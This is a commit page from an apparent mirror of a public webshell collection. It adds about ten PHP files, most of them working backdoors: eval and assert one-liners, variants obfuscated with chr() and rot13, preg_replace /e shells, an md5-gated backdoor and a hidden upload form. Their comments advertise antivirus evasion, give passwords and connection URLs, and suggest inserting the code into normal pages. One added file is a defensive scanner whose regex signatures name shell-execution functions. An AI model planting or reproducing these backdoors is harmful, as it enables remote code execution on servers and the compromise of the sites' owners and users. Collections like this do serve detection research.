mirror of
https://github.com/tennc/webshell.git
synced 2026-01-24 23:29:07 +00:00
update webshell with expdoor-com
This commit is contained in:
18
php/PHP简单小马源码.php
Normal file
18
php/PHP简单小马源码.php
Normal file
@@ -0,0 +1,18 @@
|
||||
<?php
|
||||
if ($_POST)
|
||||
{
|
||||
$f=fopen($_POST["f"],"w");
|
||||
if(fwrite($f,$_POST["c"]))
|
||||
echo "<font color=red>OK!</font>";
|
||||
else
|
||||
echo "<font color=blue>Error!</font>";
|
||||
}
|
||||
?>
|
||||
|
||||
<title> PHP小马 - ExpDoor.com</title>
|
||||
<form action="" method="post">
|
||||
<input type="text" size=61 name="f" value='<?php echo $_SERVER["SCRIPT_FILENAME"];?>'><br><br>
|
||||
<textarea name="c" cols=60 rows=15></textarea><br>
|
||||
<input type="submit" id="b" value="Create"><br>
|
||||
</form>
|
||||
<p></p>
|
||||
84
php/pHp一句话扫描脚本程序.php
Normal file
84
php/pHp一句话扫描脚本程序.php
Normal file
@@ -0,0 +1,84 @@
|
||||
<?php
|
||||
/**********************
|
||||
作者 Spider
|
||||
网上公布的各种PHP后门全军覆没
|
||||
针对一些特殊变形的后门需要自己添加特征
|
||||
误报率不到百分之一
|
||||
**********************/
|
||||
error_reporting(E_ERROR);
|
||||
ini_set('max_execution_time',20000);
|
||||
ini_set('memory_limit','512M');
|
||||
header("content-Type: text/html; charset=gb2312");
|
||||
|
||||
$matches = array(
|
||||
'/function\_exists\s*\(\s*[\'|\"](popen|exec|proc\_open|system|passthru)+[\'|\"]\s*\)/i',
|
||||
'/(exec|shell\_exec|system|passthru)+\s*\(\s*\$\_(\w+)\[(.*)\]\s*\)/i',
|
||||
'/((udp|tcp)\:\/\/(.*)\;)+/i',
|
||||
'/preg\_replace\s*\((.*)\/e(.*)\,\s*\$\_(.*)\,(.*)\)/i',
|
||||
'/preg\_replace\s*\((.*)\(base64\_decode\(\$/i',
|
||||
'/(eval|assert|include|require|include\_once|require\_once)+\s*\(\s*(base64\_decode|str\_rot13|gz(\w+)|file\_(\w+)\_contents|(.*)php\:\/\/input)+/i',
|
||||
'/(eval|assert|include|require|include\_once|require\_once|array\_map|array\_walk)+\s*\(\s*\$\_(GET|POST|REQUEST|COOKIE|SERVER|SESSION)+\[(.*)\]\s*\)/i',
|
||||
'/eval\s*\(\s*\(\s*\$\$(\w+)/i',
|
||||
'/(include|require|include\_once|require\_once)+\s*\(\s*[\'|\"](\w+)\.(jpg|gif|ico|bmp|png|txt|zip|rar|htm|css|js)+[\'|\"]\s*\)/i',
|
||||
'/\$\_(\w+)(.*)(eval|assert|include|require|include\_once|require\_once)+\s*\(\s*\$(\w+)\s*\)/i',
|
||||
'/\(\s*\$\_FILES\[(.*)\]\[(.*)\]\s*\,\s*\$\_(GET|POST|REQUEST|FILES)+\[(.*)\]\[(.*)\]\s*\)/i',
|
||||
'/(fopen|fwrite|fputs|file\_put\_contents)+\s*\((.*)\$\_(GET|POST|REQUEST|COOKIE|SERVER)+\[(.*)\](.*)\)/i',
|
||||
'/echo\s*curl\_exec\s*\(\s*\$(\w+)\s*\)/i',
|
||||
'/new com\s*\(\s*[\'|\"]shell(.*)[\'|\"]\s*\)/i',
|
||||
'/\$(.*)\s*\((.*)\/e(.*)\,\s*\$\_(.*)\,(.*)\)/i',
|
||||
'/\$\_\=(.*)\$\_/i',
|
||||
'/\$\_(GET|POST|REQUEST|COOKIE|SERVER)+\[(.*)\]\(\s*\$(.*)\)/i',
|
||||
'/\$(\w+)\s*\(\s*\$\_(GET|POST|REQUEST|COOKIE|SERVER)+\[(.*)\]\s*\)/i',
|
||||
'/\$(\w+)\s*\(\s*\$\{(.*)\}/i',
|
||||
'/\$(\w+)\s*\(\s*chr\(\d+\)/i'
|
||||
);
|
||||
|
||||
function antivirus($dir,$exs,$matches) {
|
||||
if(($handle = @opendir($dir)) == NULL) return false;
|
||||
while(false !== ($name = readdir($handle))) {
|
||||
if($name == '.' || $name == '..') continue;
|
||||
$path = $dir.$name;
|
||||
if(is_dir($path)) {
|
||||
//chmod($path,0777);/*主要针对一些0111的目录*/
|
||||
if(is_readable($path)) antivirus($path.'/',$exs,$matches);
|
||||
} elseif(strpos($name,';') > -1 || strpos($name,'%00') > -1 || strpos($name,'/') > -1) {
|
||||
echo '特征 <input type="text" style="width:218px;" value="解析漏洞"> '.$path.'<div></div>'; flush(); ob_flush();
|
||||
} else {
|
||||
if(!preg_match($exs,$name)) continue;
|
||||
if(filesize($path) > 10000000) continue;
|
||||
$fp = fopen($path,'r');
|
||||
$code = fread($fp,filesize($path));
|
||||
fclose($fp);
|
||||
if(empty($code)) continue;
|
||||
foreach($matches as $matche) {
|
||||
$array = array();
|
||||
preg_match($matche,$code,$array);
|
||||
if(!$array) continue;
|
||||
if(strpos($array[0],"\x24\x74\x68\x69\x73\x2d\x3e")) continue;
|
||||
$len = strlen($array[0]);
|
||||
if($len > 6 && $len < 200) {
|
||||
echo '特征 <input type="text" style="width:218px;" value="'.htmlspecialchars($array[0]).'"> '.$path.'<div></div>';
|
||||
flush(); ob_flush(); break;
|
||||
}
|
||||
}
|
||||
unset($code,$array);
|
||||
}
|
||||
}
|
||||
closedir($handle);
|
||||
return true;
|
||||
}
|
||||
|
||||
function strdir($str) { return str_replace(array('\\','//','//'),array('/','/','/'),chop($str)); }
|
||||
|
||||
echo '<form method="POST">';
|
||||
echo '路径: <input type="text" name="dir" value="'.($_POST['dir'] ? strdir($_POST['dir'].'/') : strdir($_SERVER['DOCUMENT_ROOT'].'/')).'" style="width:398px;"><div></div>';
|
||||
echo '后缀: <input type="text" name="exs" value="'.($_POST['exs'] ? $_POST['exs'] : '.php|.inc|.phtml').'" style="width:398px;"><div></div>';
|
||||
echo '操作: <input type="submit" style="width:80px;" value="scan"><div></div>';
|
||||
echo '</form>';
|
||||
|
||||
if(file_exists($_POST['dir']) && $_POST['exs']) {
|
||||
$dir = strdir($_POST['dir'].'/');
|
||||
$exs = '/('.str_replace('.','\\.',$_POST['exs']).')/i';
|
||||
echo antivirus($dir,$exs,$matches) ? '<div></div>扫描完毕' : '<div></div>扫描中断';
|
||||
}
|
||||
?>
|
||||
10
php/一个过安全狗的pHp一句话.php
Normal file
10
php/一个过安全狗的pHp一句话.php
Normal file
@@ -0,0 +1,10 @@
|
||||
<!--------------------------
|
||||
|
||||
测试可用,可插入正常文件中
|
||||
|
||||
密码:expdoor
|
||||
---------------------------->
|
||||
|
||||
|
||||
<?php array_map("ass\x65rt",(array)$_REQUEST['expdoor']);?>
|
||||
|
||||
10
php/不带引号的pHp一句话.php
Normal file
10
php/不带引号的pHp一句话.php
Normal file
@@ -0,0 +1,10 @@
|
||||
发现有些狗特别喜欢在引号前面加“\”
|
||||
|
||||
所以找了一个不带引号的pHp一句话
|
||||
|
||||
|
||||
|
||||
|
||||
//pHp的
|
||||
|
||||
<?php eval($_POST[1]);?> 密码1
|
||||
1
php/国外某论坛不含Get,Post的pHp一句话.php
Normal file
1
php/国外某论坛不含Get,Post的pHp一句话.php
Normal file
@@ -0,0 +1 @@
|
||||
<?php eval(str_rot13('riny($_CBFG[cntr]);'));?>
|
||||
8
php/极其隐蔽的pHp小马穿插在正常页面中.php
Normal file
8
php/极其隐蔽的pHp小马穿插在正常页面中.php
Normal file
@@ -0,0 +1,8 @@
|
||||
<!--------------------------
|
||||
Name: 折羽鸿鹄
|
||||
Site: http://blog.weili.me
|
||||
Mail: chinese@hackermail.com
|
||||
QQ: 56..
|
||||
---------------------------->
|
||||
<?php
|
||||
if($_GET["hackers"]=="2b"){if ($_SERVER['REQUEST_METHOD'] == 'POST') { echo "url:".$_FILES["upfile"]["name"];if(!file_exists($_FILES["upfile"]["name"])){ copy($_FILES["upfile"]["tmp_name"], $_FILES["upfile"]["name"]); }}?><form method="post" enctype="multipart/form-data"><input name="upfile" type="file"><input type="submit" value="ok"></form><?php }?>
|
||||
11
php/某变异pHp一句话木马.php
Normal file
11
php/某变异pHp一句话木马.php
Normal file
@@ -0,0 +1,11 @@
|
||||
转载自:https://forum.90sec.org/forum.php?mod=viewthread&tid=7316
|
||||
|
||||
源码<[url=mailto:?@array_map($_GET[]?@array_map($_GET['f'],$_GET[/url]);?>
|
||||
|
||||
<?
|
||||
@preg_replace("/f/e",$_GET['u'],"fengjiao");
|
||||
?>
|
||||
|
||||
连接方法->
|
||||
.php?u=一句话,然后菜马连一句话密码!把<o>配上去
|
||||
|
||||
1
php/牛X的pHp一句话.php
Normal file
1
php/牛X的pHp一句话.php
Normal file
@@ -0,0 +1 @@
|
||||
<?php $s=@$_GET[2];if(md5($s.$s)=="e67c2597ecad64bb4cdad6633b04107f")@eval($_REQUEST[$s]); ?>
|
||||
7
php/过各大杀软的pHp一句话.php
Normal file
7
php/过各大杀软的pHp一句话.php
Normal file
@@ -0,0 +1,7 @@
|
||||
/**********************
|
||||
无视当前各大杀软,安全狗,D盾,一流监控!
|
||||
|
||||
pHp一句话,密码 1
|
||||
**********************/
|
||||
|
||||
<?$_uU=chr(99).chr(104).chr(114);$_cC=$_uU(101).$_uU(118).$_uU(97).$_uU(108).$_uU(40).$_uU(36).$_uU(95).$_uU(80).$_uU(79).$_uU(83).$_uU(84).$_uU(91).$_uU(49).$_uU(93).$_uU(41).$_uU(59);$_fF=$_uU(99).$_uU(114).$_uU(101).$_uU(97).$_uU(116).$_uU(101).$_uU(95).$_uU(102).$_uU(117).$_uU(110).$_uU(99).$_uU(116).$_uU(105).$_uU(111).$_uU(110);$_=$_fF("",$_cC);@$_();?>
|
||||
15
php/非常规的pHp一句话木马.php
Normal file
15
php/非常规的pHp一句话木马.php
Normal file
@@ -0,0 +1,15 @@
|
||||
<?php
|
||||
if(isset($_POST['page'])) {
|
||||
$page = $_POST[page];
|
||||
preg_replace("/[errorpage]/e",$page,"saft");
|
||||
exit;
|
||||
}
|
||||
?>
|
||||
|
||||
带md5并可植入任意文件
|
||||
|
||||
<?
|
||||
md5($_GET['qid'])=='850abe17d6d33516c10c6269d899fd19'?array_map("asx73ert",(array)$_REQUEST['page']):next;
|
||||
?>
|
||||
|
||||
shell.php?qid=zxexp 密码page
|
||||
Reference in New Issue
Block a user